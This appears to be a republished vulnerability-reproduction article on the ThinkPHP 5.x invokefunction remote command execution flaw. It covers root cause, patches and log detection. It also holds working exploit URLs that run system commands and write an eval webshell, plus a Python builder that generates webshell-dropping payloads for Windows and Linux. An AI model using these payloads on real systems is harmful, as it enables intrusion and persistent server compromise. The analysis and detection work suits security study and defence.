[Vulnerability reproduction] ThinkPHP 5.x remote command execution (getshell)

2025-02-27 Update. From: SLTechnology News&Howtos > Network Security

Shulou (Shulou.com) 06/01 Report --

0x00 Reproduction environment

ThinkPHP 5.x (versions below v5.0.23 and v5.1.31) remote command execution vulnerability exploitation (getshell)

0x01 Steps

Click "Start to hack" to enter the environment page, run the project, and then visit the target address that is provided.

Execute a system command to list the files in the current directory:

http://aaa.vsplate.me:52763/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

Execute phpinfo (here by running php -r 'phpinfo();' through system):

http://aaa.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

Write a webshell. Note that the ^ characters are cmd.exe escapes for < and >, so this form targets a Windows host; on a Linux target the payload has to be quoted for /bin/sh instead:

http://aaa.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php

Beyond these three, use your imagination.
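The three steps above are the same request with a different vars[1][] value. The following is an added example (not the article's own tooling) that builds that request programmatically, quotes the webshell correctly for either cmd.exe or /bin/sh, and checks for the vulnerability without writing anything to the target by echoing a random marker and looking for it in the response. The TARGET constant is the lab host from the article and is an assumption; replace it with a host you are authorized to test.

```python
"""Payload builder and non-destructive probe for the ThinkPHP 5.x
invokefunction RCE described above. Added example; not the article's tool."""
import secrets
import shlex
import urllib.request
from urllib.parse import quote, urlencode

# Assumption: the lab target from the article; replace with a host you are
# authorized to test.
TARGET = "http://aaa.vsplate.me/public/index.php"

# Minimal webshell body used by the "write shell" step.
WEBSHELL = '<?php @eval($_GET["code"]); ?>'


def build_rce_url(base, command, php_callable="system"):
    """Build the route-hijack URL.

    s=/index/\\think\\app/invokefunction: the leading backslash makes the
    framework use 'think\\app' as a fully qualified class name, so the
    "controller" is think\\App and the action is its invokefunction() method.
    invokefunction(call_user_func_array, [system, [command]]) then runs
    system(command).
    """
    params = [
        ("s", "/index/\\think\\app/invokefunction"),
        ("function", "call_user_func_array"),
        ("vars[0]", php_callable),
        ("vars[1][]", command),
    ]
    # Keep '/' and '\' literal so the URL reads like the ones in the article;
    # PHP url-decodes $_GET either way.
    return base + "?" + urlencode(params, safe="/\\", quote_via=quote)


def write_shell_command(target_os, filename="shell.php"):
    """Shell command that drops WEBSHELL, quoted for the target's shell."""
    if target_os == "windows":
        # cmd.exe: '<' and '>' inside the echoed text must be caret-escaped,
        # otherwise cmd treats them as redirections. The final unescaped '>'
        # is the real redirection into the file.
        escaped = WEBSHELL.replace("<", "^<").replace(">", "^>")
        return f"echo {escaped}>{filename}"
    # POSIX sh: single-quote the whole payload; nothing inside needs escaping.
    return f"echo {shlex.quote(WEBSHELL)} > {filename}"


def build_probe(base):
    """Vulnerability check that writes nothing: echo a random marker and look
    for it in the response. Returns (url, marker)."""
    marker = "tp5rce" + secrets.token_hex(6)
    return build_rce_url(base, f"echo {marker}"), marker


def confirmed(body, marker):
    """True when the command output (the marker) came back in the HTTP body."""
    return marker in body


def probe(base=TARGET, timeout=5):
    """Send the probe and report whether the target executed the command."""
    url, marker = build_probe(base)
    with urllib.request.urlopen(url, timeout=timeout) as resp:  # network I/O
        body = resp.read().decode("utf-8", "replace")
    return confirmed(body, marker)


if __name__ == "__main__":
    print(build_rce_url(TARGET, "ls -l"))
    print(build_rce_url(TARGET, write_shell_command("windows")))
    print(build_rce_url(TARGET, write_shell_command("linux")))
    print("vulnerable" if probe() else "not confirmed")
```

The probe is the form to use when confirming exposure across many hosts: a random echo marker cannot be confused with a cached page or an error body, and it leaves no file behind the way the shell.php step does.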

0x02 Vulnerability principle: analysis of the key code

Before the fix, the program did not filter the controller name, so an attacker could call any class's method by introducing the \ symbol.

The $this->app->controller method instantiates the controller and then calls the requested method on that instance.

Follow the controller method: thinkphp/library/think/App.php

$module and $class are parsed by the parseModuleAndClass method, and $class is then instantiated.

thinkphp/library/think/App.php

When $name starts with a backslash \, it is used directly as the class name.

Because of this namespace handling, anyone who controls $name here (that is, the controller part of the route) can instantiate an arbitrary class.

thinkphp/library/think/route/Rule.php

Looking back at the route-resolution code, the route/dispatch/Url.php::parseUrl method calls route/Rule.php::parseUrlPath to parse the routing information out of pathinfo.

route/dispatch/Url.php

route/Rule.php

$url is simply split on / without any filtering of the pieces.

The routing URL is obtained from Request::path().

Within it, look at the pathinfo function.

Since the default value of var_pathinfo is s, the routing information can be passed through $_GET['s'], or alternatively through PATH_INFO.

However, during testing the \ in $_SERVER['PATH_INFO'] is replaced with / on Windows, which is why the s parameter is used here. Combined with the analysis above, the preliminary exploitation payload is:

index.php?s=index/\namespace\class/method

This instantiates the class \namespace\class and executes its method method.
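To make the chain above concrete, here is an added example, written in Python as an approximation of the PHP logic just described rather than the framework's own code: Request::pathinfo() preferring $_GET['s'] over PATH_INFO, parseUrlPath splitting on / without filtering, and parseModuleAndClass taking a leading backslash as a fully qualified class name. The patched branch models the fix as a whitelist regex on the controller name; that regex is an assumption about the shape of the fix, and the exact expression is in the commits linked under 0x04. The Windows rewrite of \ to / in PATH_INFO is not modelled.

```python
"""Toy model of ThinkPHP 5's route resolution before and after the fix.
Added example: a Python approximation of the PHP logic discussed above, not
the framework's own code."""
import re

# Assumption: the shape of the whitelist the fix introduces. A controller name
# must start with a letter and contain only word characters or dots, so a
# leading backslash (PHP namespace separator) never reaches the class loader.
CONTROLLER_RE = re.compile(r"^[A-Za-z](\w|\.)*$")

VAR_PATHINFO = "s"  # default value of the 'var_pathinfo' config key


def pathinfo(get, server):
    """Request::pathinfo(): the compatibility parameter $_GET['s'] wins over
    $_SERVER['PATH_INFO']."""
    if VAR_PATHINFO in get:
        return get[VAR_PATHINFO]
    return server.get("PATH_INFO", "")


def parse_url_path(url):
    """route/Rule.php::parseUrlPath: trim slashes and split on '/' with no
    filtering of the pieces."""
    url = url.strip("/")
    return url.split("/") if url else []


def parse_module_and_class(module, name):
    """App::parseModuleAndClass: a name starting with '\\' is used verbatim as
    a fully qualified class, otherwise app\\<module>\\controller\\<Name>."""
    if name.startswith("\\"):
        return name
    return f"app\\{module}\\controller\\{name.capitalize()}"


def resolve(get, server, patched=False):
    """Return (module, class, action) for a request. On the patched path the
    controller name is checked against the whitelist first."""
    parts = parse_url_path(pathinfo(get, server))
    module = parts[0] if len(parts) > 0 else "index"
    controller = parts[1] if len(parts) > 1 else "Index"
    action = parts[2] if len(parts) > 2 else "index"
    if patched and not CONTROLLER_RE.match(controller):
        raise ValueError(f"controller not exists:{controller}")
    return module, parse_module_and_class(module, controller), action


if __name__ == "__main__":
    attack = {"s": "/index/\\think\\app/invokefunction"}
    print(resolve(attack, {}))  # ('index', '\\think\\app', 'invokefunction')
    print(resolve({}, {"PATH_INFO": "/index/user/list"}))
    try:
        resolve(attack, {}, patched=True)
    except ValueError as e:
        print("patched:", e)
```

The vulnerable path resolves the "controller" \think\app to the class think\App itself, whose invokefunction method is then called with attacker-controlled arguments; the patched path rejects the name before any class is looked up, while ordinary routes such as index/user/list still resolve as before.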

0x03 Vulnerability PoC

Written using the pocsuite framework.

0x04 Vulnerability fix

Patch for ThinkPHP v5.0.x: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

Patch for ThinkPHP v5.1.x: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

0x05 Vulnerability exploitation (current * methods)

Threat warning | New ThinkPHP v5 vulnerability: first * case exposed
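Since this vulnerability was being exploited in the wild, defenders want to find attempts in their web-server logs. The following is an added example (not from the article) that scans Apache combined-format access log lines for the two routing forms discussed above, the s= parameter and PATH_INFO, and recovers the decoded payload. The log lines are constructed for the demonstration, not captured from a real server; the detection rule rests on the fact that legitimate ThinkPHP routes are module/controller/action names and never contain a backslash.

```python
"""Scan web-server access logs for ThinkPHP 5.x invokefunction exploitation
attempts. Added example, not the article's own; the log lines below are
constructed for the demo, not captured from a real server."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines: two attacks through the s=
# parameter (one with the backslashes percent-encoded), one benign request,
# and one attack through PATH_INFO.
SAMPLE_LOG = [
    r'203.0.113.5 - - [10/Dec/2018:12:00:01 +0000] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1" 200 512 "-" "python-requests/2.20.1"',
    r'203.0.113.5 - - [10/Dec/2018:12:00:02 +0000] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 HTTP/1.1" 200 91020 "-" "python-requests/2.20.1"',
    r'198.51.100.7 - - [10/Dec/2018:12:00:03 +0000] "GET /public/index.php?s=/index/user/profile&id=7 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    r'198.51.100.9 - - [10/Dec/2018:12:00:04 +0000] "GET /public/index.php/\think\app/invokefunction?function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 96 "-" "curl/7.61.0"',
]

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]*)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)


def route_of(target):
    """Recover the route the way the framework does: the 's' query parameter
    (default var_pathinfo) wins, otherwise the PATH_INFO part after index.php.
    Returns (route, parsed_query)."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes
    if "s" in query:
        return query["s"][0], query
    path = unquote(parts.path)
    idx = path.find("index.php")
    route = path[idx + len("index.php"):] if idx >= 0 else path
    return route, query


def is_exploit_route(route):
    """Legitimate ThinkPHP routes are module/controller/action names and never
    contain a backslash; the invokefunction action name is a second signal."""
    return "\\" in route or "invokefunction" in route.lower()


def scan(lines):
    """Return one finding per suspicious request, with the decoded payload."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        route, query = route_of(m.group("target"))
        if not is_exploit_route(route):
            continue
        findings.append({
            "client": m.group("client"),
            "time": m.group("ts"),
            "route": route,
            "function": query.get("function", [None])[0],
            "callable": query.get("vars[0]", [None])[0],
            "args": query.get("vars[1][]", []),
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['route']} -> {f['callable']}({f['args']})")
```

Matching on the decoded route rather than on the literal string \think\app catches the percent-encoded variant and the PATH_INFO variant alike, and the recovered vars[0]/vars[1][] values tell an incident responder what was actually executed rather than just that something was tried.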

0x06 References

http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23%E5%8F%8Av5.1.31%E4%BB%A5%E4%B8%8B%E7%89%88%E6%9C%AC)_%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%EF%BC%88getshell%EF%BC%89/

[2019-1-24 update] Found that some experts have published dynamic debugging of this; worth a try the next time it is reproduced.


© 2024 shulou.com SLNews company. All rights reserved.
